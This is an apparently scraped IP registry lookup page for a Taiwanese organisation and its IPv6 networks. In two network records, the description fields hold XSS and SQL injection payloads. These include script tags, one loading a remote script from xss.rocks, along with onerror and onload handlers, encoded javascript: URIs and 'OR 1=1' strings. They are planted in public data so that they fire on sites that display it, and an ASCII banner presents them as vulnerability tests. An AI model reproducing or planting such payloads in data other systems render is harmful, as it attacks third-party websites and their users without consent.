Found: 1 organisations
Organisation details

Sung Yu Li

ORG-SYL2-RIPE ยท Taiwan

Assigned AS: AS207469
IPv4 networks: 0
IPv6 networks: 3
SUNGYULI-FFE0-46
2a0f:5707:ffe0:: โ€” 2a0f:5707:ffe3:ffff:ffff:ffff:ffff:ffff </textarea><script>alert(location.href,"XSS! FUX IT.")</script> <script src=http://xss.rocks/xss.js></script> <img src="javascript:alert('XSS! FUX IT.');"> <img src="o" onerror="alert('XSS! FUX IT.')"></img> ' -- OR 1 = 1 AND 'SQLi' = 'SQLi' " -- OR 1 = 1 AND 'SQLi' = 'SQLi' ` -- OR 1 = 1 AND 'SQLi' = 'SQLi' <svg onload=alert%26%230000000040"XSS! FUX IT")> <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'> <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')> <IMG SRC=`javascript:alert("XSS! FUX IT")`> <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC= onmouseover="alert('xxs')"> <img src=x onerror="& # 0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"> <IMG SRC=& # 106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC="jav ascript:alert('XSS! FUX IT');"> .----------------. .----------------. .----------------. | .--------------. | | .--------------. | | .--------------. | | | ____ ____ | | | | _______ | | | | _______ | | | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | | | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | | | | > `' < | | | | '.___`-. | | | | '.___`-. | | | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | | | | |____||____| | | | | |_______.' | | | | |_______.' | | | | | | | | | | | | | | | '--------------' | | '--------------' | | '--------------' | '----------------' '----------------' '----------------' |--------------------------------*---------------------------------| | Hello there! | | Maybe you saw these texts in descr. | | These texts are used to test XSS vulnerability in website :) | | If you see the alert which said 'XSS' or something, | | then maybe the website you are looking at is vulnerable, | | please contact the website owner to fix this :). | | (By the way, there has a SQL injection test too.) | | | | Contact me : noc at sciuridae.network | |------------------------------------------------------------------| Germany 2a0f:5707:ffe0::/46 282
SUNGYULI-FFF3
2a0f:5707:fff3:: โ€” 2a0f:5707:fff3:ffff:ffff:ffff:ffff:ffff </textarea><script>alert(location.href,"XSS! FUX IT.")</script> <script src=http://xss.rocks/xss.js></script> <img src="javascript:alert('XSS! FUX IT.');"> <img src="o" onerror="alert('XSS! FUX IT.')"></img> ' -- OR 1 = 1 AND 'SQLi' = 'SQLi' " -- OR 1 = 1 AND 'SQLi' = 'SQLi' ` -- OR 1 = 1 AND 'SQLi' = 'SQLi' <svg onload=alert%26%230000000040"XSS! FUX IT")> <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'> <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')> <IMG SRC=`javascript:alert("XSS! FUX IT")`> <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC= onmouseover="alert('xxs')"> <img src=x onerror="& # 0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"> <IMG SRC=& # 106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC="jav ascript:alert('XSS! FUX IT');"> Germany 2a0f:5707:fff3::/48 280
SUNGYULI-1053
2a0f:607:1053:: โ€” 2a0f:607:1053:ffff:ffff:ffff:ffff:ffff Japan 2a0f:607:1053::/48 280